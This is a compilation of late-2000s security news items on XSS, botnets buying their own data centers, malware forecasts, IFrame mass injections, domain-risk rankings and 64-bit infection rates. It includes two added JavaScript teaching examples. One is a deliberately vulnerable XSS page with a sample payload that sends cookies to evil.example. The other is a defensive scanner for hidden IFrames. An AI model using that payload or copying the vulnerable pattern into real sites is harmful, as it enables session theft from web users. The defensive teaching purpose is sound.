We all know that each advance in technology opens new opportunities for those who want to harm that technology's users. The Internet is, if anything, an object lesson in this truism. Once the Internet went mainstream, so too did viruses, spyware, DoS attacks, and all the other nastiness we lump together under the heading of malware. One long-standing weakness in the Internet's security armor is cross-site scripting (XSS). For the better part of a decade it has left a door wide open for attacks on Internet users.
Michael Sutton, vice president of security research at Zscaler, says that XSS has typically required a user to click a crafted link, such as those that arrive in spam or phishing messages; the script carried in that link then runs in the user's browser with the privileges of the trusted site. But, he continues, XSS is becoming more sophisticated. Rather than being limited to a single user-to-website interaction, Sutton says that XSS payloads can now live inside a web platform, such as a social networking site, and spread from account to account among all the users in that network's ecosystem.
Sutton also says that such sophisticated attacks, so far, have been by “[b]ored and bright individuals...tinkering with the concept”, and that “true criminals wait on the sidelines ready to move in when traditional techniques fail to achieve desired goals.” Translation: another malware threat to be concerned about. Not today, perhaps, but definitely tomorrow.
Solutions aren't all that difficult. Users could quit doing risky things: if you don't know where an email came from, don't click the link in it. But, let's face it, there will always be a few of us who click anyway, which means another layer of protection is needed. Sutton says that layer has to come from developers, who need to be more vigilant about building the necessary protections into web code, such as Microsoft has done with the reflected-XSS filter in Internet Explorer 8. A browser-side filter is a backstop, though, not a substitute for the server encoding untrusted input before writing it into a page.
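The developer-side fix Sutton is asking for, shown as an added example (not code from the article or from Zscaler): a page that echoes a search term back into its HTML, first as a reflected-XSS bug, then hardened with contextual output encoding. Function names and the attacker payload are constructed for this illustration; the same encoding applies to stored content such as a social-network profile field.

```javascript
// Added example (not from the article): a reflected-XSS bug and its fix.
// A results page echoes the user's search term back into the HTML it returns.
// Function names are hypothetical; the payload is a constructed sample.

// Vulnerable: the query is concatenated straight into the markup, so a crafted
// link (e.g. from a phishing mail) runs attacker script in the victim's browser,
// in the origin of the trusted site.
function renderSearchResultsVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Contextual output encoding for an HTML text node: the five characters that
// can change the HTML parser's state are replaced with entity references.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: the same page, with the untrusted value encoded for its context.
function renderSearchResults(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Constructed attacker payload, as it would arrive URL-decoded from ?q=...
const payload =
  '<script>document.location="http://evil.example/?c="+document.cookie</script>';

// Crude check: does the rendered page contain a live <script> tag the author
// never put there? (Good enough for this demonstration, not a general scanner.)
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

console.log('vulnerable page executes payload:', containsScriptTag(renderSearchResultsVulnerable(payload)));
console.log('hardened page executes payload:  ', containsScriptTag(renderSearchResults(payload)));
console.log(renderSearchResults(payload));
```

In practice the encoding belongs in the templating layer (most modern engines auto-escape by default) rather than in hand-written calls, and it has to match the context: the HTML-text encoding above is not sufficient for a value written into a JavaScript string, a URL, or an attribute without quotes.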
Traditionally, the lowlifes running botnets have made do with hosting from shady ISPs. As these crimes become higher profile, enforcement has stepped up, and many of those ISPs have gone offline. To get around that, it looks like some purveyors of malware have started buying their own data centers.
It's depressingly easy to do. The people running a botnet need only acquire a block of IP addresses from one of the Regional Internet Registries (RIRs) or from a Local Internet Registry (LIR). These registries are supposed to allocate address blocks only to organizations that actually operate networks: large companies, ISPs and telecoms. It turns out the registries aren't doing their due diligence on applications. Once the bad guys have the addresses, they buy some servers in a data center and become their own ISP.
This takes away the authorities' best point of leverage, the hosting provider. "If there's a problem, who are you going to talk to? It's a different ball game now. These guys are buying their own data centers. These LIRs and RIRs aren't going to push back if you say you need a /24 or /16. They're not the Internet police," said Alex Lanstein of FireEye Research. The practice is becoming common in places like Europe and the Caribbean. Worse, clawing the IP addresses back can take a lot of time and effort; the procedures for doing so simply don't exist. The solution? There isn't one right now, but if you have an idea, we'd love to hear it in the comments.
Cybercriminals have a lot in common with Periplaneta americana, the American cockroach. They seek out the dark, poking and prodding for ways in where they are unwanted. In their case it isn't food they are after but the misery of computer users. And, just like cockroaches, once you think you have them blocked, they find a new way in.
Kaspersky Lab's Cyberthreat Forecast for 2010 says that IT managers and users are becoming more savvy, which makes fake programs, gaming Trojans and malicious web sites less profitable for cybercriminals. Instead, it looks like they'll turn their attention to P2P networks, botnets and mobile platforms.
P2P networks will be used to distribute malware. According to Kaspersky: “This method has been used to spread notorious threats such as TDSS and Virut as well as the first backdoor for Mac OS X. In 2010, we expect to see a significant increase in these types of incidents on P2P networks.”
Mobile platforms, the iPhone and Android in particular, will also be targeted more often. Kaspersky expects that iPhone users whose handsets have not been compromised will be okay, but that Android users might be in for some pain: “The increasing popularity of mobile phones running the Android OS combined with a lack of effective checks to ensure third-party software applications are secure, will lead to a number of high-profile malware outbreaks.”
As for botnets, Kaspersky sees them as offering profitable possibilities by manipulating Internet traffic: “In the future, we foresee the emergence of more "grey" schemes in the botnet services market. These so-called "partner programs" enable botnet owners to make a profit from activities such as sending spam, performing denial of service (DoS) attacks or distributing malware without committing an explicit crime.”
Lastly, Kaspersky sees Google Wave as a potential target for 2010. It's new, it's untested, and that makes it attractive to attackers. Kaspersky says: “Attacks on this new Google service will no doubt follow the usual pattern: first, the sending of spam, followed by phishing attacks, then the exploiting of vulnerabilities and the spreading of malware.”
Malware is no easy thing to get rid of, bandwidth-hogging botnets in particular. One small chink in the Internet's security armor is all it takes for malware to thrive. Recognizing that no single entity can combat malware alone, the German Federal Office for Information Security (BSI), the Association of the German Internet Industry (eco), and German Internet service providers (ISPs) have come together to establish a malware clean-up helpline for Germany.
The three groups will work together to identify infected machines and get the malware removed. ISPs will be on the front line, hunting down infected computers on their networks. An ISP will notify the owner of a machine suspected of infection and direct her to a website with instructions for cleaning it. If the website's advice doesn't resolve the problem, the owner will be referred to a call center where real-time help is available.
Germany's need for the service is great indeed: Germany ranks third in the world for the number of infected computers. The new venture, according to eco, has already raised security awareness among German computer users. With the addition of professional support for removing malware, eco hopes to see Germany drop out of the top ten.
As if there weren't already enough infected websites floating around in cyberspace, security researchers are warning of a new mass injection attack that has compromised more than 130,000 websites since it began in late November.
Researchers say the malicious code is a rogue IFrame used to exploit visitors' browsers and infect their PCs with a banking Trojan.
"The injected IFrame loads the first stage of malicious content from 318x.com. A series of IFrames and code redirections (invisible to the user) then ensues, culminating in a rather curious method for managing the final payload," explains Mary Landesman, senior security researcher at Web security company ScanSafe, now part of Cisco.
Landesman says the redirects fingerprint the potential victim's web browser, Flash Player version and other details, so that only the exploits relevant to that person's setup are served.
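A triage check for the injection pattern described above, as an added example that is not code from ScanSafe or the article: scan fetched HTML for IFrames that both point off-site and are hidden from the user, which is the signature of an injected first stage. 318x.com is the host named in the ScanSafe quote; every other hostname and the sample page itself are constructed for this example.

```javascript
// Added example (not from the ScanSafe report): flag injected IFrames in fetched HTML.
// 318x.com is the first-stage host named in the report; all other hostnames and the
// sample page are made up for this illustration.

// CSS tricks commonly used to keep an injected frame out of sight.
const HIDDEN_STYLE = /display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}/i;

// Pull the attributes of every <iframe ...> start tag into a plain object.
// A regex scan is adequate for triage; a real crawler would use a DOM parser.
function extractIframes(html) {
  const tags = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  const attrRe = /([a-zA-Z_:][\w:.-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = {};
    let a;
    while ((a = attrRe.exec(m[1])) !== null) {
      const value = a[2] !== undefined ? a[2] : a[3] !== undefined ? a[3] : a[4];
      attrs[a[1].toLowerCase()] = value === undefined ? null : value;
    }
    tags.push(attrs);
  }
  return tags;
}

// True for width/height values of 0 or 1 ("0", "1", "1px").
function isTiny(value) {
  const n = parseInt(value, 10);
  return !Number.isNaN(n) && n <= 1;
}

// Returns [{src, reasons}] for iframes that look injected. siteHost is the host the
// page was served from. Off-site alone is normal (ads, video embeds); off-site *and*
// hidden is the pattern worth a look, so two or more reasons are required.
function suspiciousIframes(html, siteHost) {
  const findings = [];
  for (const attrs of extractIframes(html)) {
    const src = attrs.src || '';
    const reasons = [];
    let host = '';
    try { host = new URL(src, `http://${siteHost}/`).hostname; } catch (e) { /* unparsable src */ }
    if (host && host !== siteHost && !host.endsWith(`.${siteHost}`)) reasons.push(`off-site src ${host}`);
    if (isTiny(attrs.width) || isTiny(attrs.height)) reasons.push('zero/one-pixel dimensions');
    if (HIDDEN_STYLE.test(attrs.style || '')) reasons.push('hidden via CSS');
    if (reasons.length >= 2) findings.push({ src, reasons });
  }
  return findings;
}

// Constructed sample: a legitimate video embed, an injected hidden frame, and a
// tiny same-site tracking frame that should not be flagged on its own.
const SAMPLE_PAGE = `<html><body>
<h1>Welcome</h1>
<iframe src="http://player.video-embed.example/v/42" width="640" height="360"></iframe>
<iframe src="http://318x.com/a/in.php" width="0" height="0" style="visibility:hidden"></iframe>
<iframe src="/local/widget" width="1" height="1"></iframe>
</body></html>`;

console.log(JSON.stringify(suspiciousIframes(SAMPLE_PAGE, 'www.victim-site.example'), null, 2));
```

Run against the sample page it reports only the 318x.com frame. Attackers also build the frame with document.write or obfuscated script so it never appears as literal markup, which is why this kind of static check is a first pass rather than a complete detector.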
McAfee used its SiteAdvisor technology to crawl the web and test domains for security threats, 27 million domains in all. Overall, McAfee reports that 5.8% of them were risky. That percentage is up over 2007 and 2008 but, McAfee says, because of a change in methodology it isn't possible to conclude that the Internet has become riskier.
The places to avoid? By Top Level Domain (TLD) they are .CM (Cameroon), with a risk factor of 36.7%, .COM (Commercial), 32.3%, .CN (People’s Republic of China), 23.4%, .WS (Samoa), 17.8%, and .INFO (Information), 15.8%. For downloads the worst place to be is .RO (Romania).
The safest places to play on the Internet (and perhaps the least interesting), are .GOV (Government), .JP (Japan), .EDU (Education), .IE (Ireland), and .HR (Croatia).
The United States sits in the riskier part of the list, ranked 17th, with a risk ratio of 3.1%.
McAfee also says the likelihood of receiving spam after registering with an email address on a site has dropped from 7.6% to 2.8%. And the percentage of sites delivering viruses, spyware or adware has edged down, from 4.7% to 4.5%. (McAfee cautions that this last finding doesn't mean there are fewer potentially unwanted programs (PUPs) in the tubes, but rather that they are getting harder to detect with standard techniques.)
Overall, sites registered in the Americas, Europe, the Middle East, and Africa are relatively safe. Sites registered in the Asia-Pacific region are not.
For those of us who frequently download applications, programs, extensions, or really anything off the Internet, what's the best way to keep a computer protected from external threats? I'm talking about locking down your system tighter than a Supermax prison, not by impeding your everyday tasks but by making sure you're protected at your PC's primary entry points.
That's exactly what I'll be exploring in this week's freeware roundup: The five best free applications for keeping your computer as secure as can be. If you aren't running some combination of these freeware and open-source apps, well, you only have yourself to blame if your system gets infected with something unpleasant!
According to Faulhaber, who relied on telemetry gathered by Microsoft's Malicious Software Removal Tool (MSRT), during the first half of 2009 64-bit Windows XP was 48 percent less likely to be infected than its 32-bit counterpart, and 64-bit Vista 35 percent less likely. No figures were available for Windows 7, for the obvious reason that it hadn't been released yet, but the same is expected to hold true for it. Faulhaber suggests the reason 64-bit versions fare better is that malware, written mostly for the 32-bit world, simply fails to install or run correctly on 64-bit. There is a concrete mechanism behind that: 64-bit Windows will not load 32-bit kernel drivers at all, and 64-bit Vista additionally requires kernel-mode drivers to be signed, so the rootkit components of typical 32-bit malware never get a foothold.
Not so fast, chicken Marengo! Alfred Huger, vice president of engineering at the security firm Immunet and formerly of Symantec, says there's plenty of 64-bit malware out there. In fact, it's easy for malware authors to whip up 64-bit versions if and when they want to. The low level of 64-bit infection, he says, owes more to the low market penetration of 64-bit Windows: if not many people are using it, malware makers have no incentive to pay attention.
Microsoft's own semi-annual Security Intelligence Report offers another possibility: 64-bit users are more technically savvy than 32-bit users, and so less likely to bring malware onto their machines. The report concludes that as 64-bit Windows spreads beyond the province of techno-geeks, the current gap in infection rates between 32-bit and 64-bit will evaporate.
Security firm FireEye has reportedly struck a massive blow against spam. The so-called “Mega-D” (or “Ozdok”) spam botnet was effectively dismantled by its researchers. After studying the beast, FireEye moved against it by notifying the ISPs hosting its command-and-control (CnC) servers, having the active CnC domains taken down, and then registering the botnet's not-yet-used CnC domains before the botmasters could.
Almost immediately, the spam stopped. No small feat, considering Ozdok was probably responsible for about a third of the world's spam. This takes the load off ISPs, which had been forced to filter the botnet's spam; individual users probably won't notice much difference.
FireEye found that more than 246,000 zombie machines were reporting to the CnC domains now in its possession after the takedown. The firm plans to work with ISPs to identify the owners of those PCs so the malicious software can be removed.
PC MightyMax 2009 was included with the purchase of my new HP a6827c with Windows Vista. After trying out MightyMax I decided I didn’t want it due to its obscene costs. I obtained the instructions for removal—go to the Start menu, go to the PC MightyMax folder, and hit the uninstall button, but the software does not fully uninstall. Help! —Shannon Swank
Doctor, I managed to get two computers infected with AntiVirus2009, simply by following a link to a video review online. Both machines run Windows XP Professional SP3. One is a Dell Vostro laptop, the other is a desktop I built about three years ago.
I’ve run Malwarebytes’ Anti-Malware, which removed a bunch of copies, Rogue Remover, SuperAntiSpyware, ThreatFire, and ZoneAlarm Internet Security, but every so often a new browser window will suddenly open and try to access AntiVirus2009.com. I’ve looked at every website on the Internet (well almost) and nothing I’ve tried will get rid of it on either computer. The only way I’ve been able to keep using the computers is to manually block antivirus200*.* in ZoneAlarm. Every time I check the log, there’s entry after entry where it tried to send an ICMP ping to that website or tried to open Firefox to access it. I’m at the end of my rope. I don’t know what else to do and I’m sure that there are other people out there having much the same problem as I am. Is my only hope to re-install Windows? —Steve Rugg
Read our advice for both Shannon and Steve after the jump.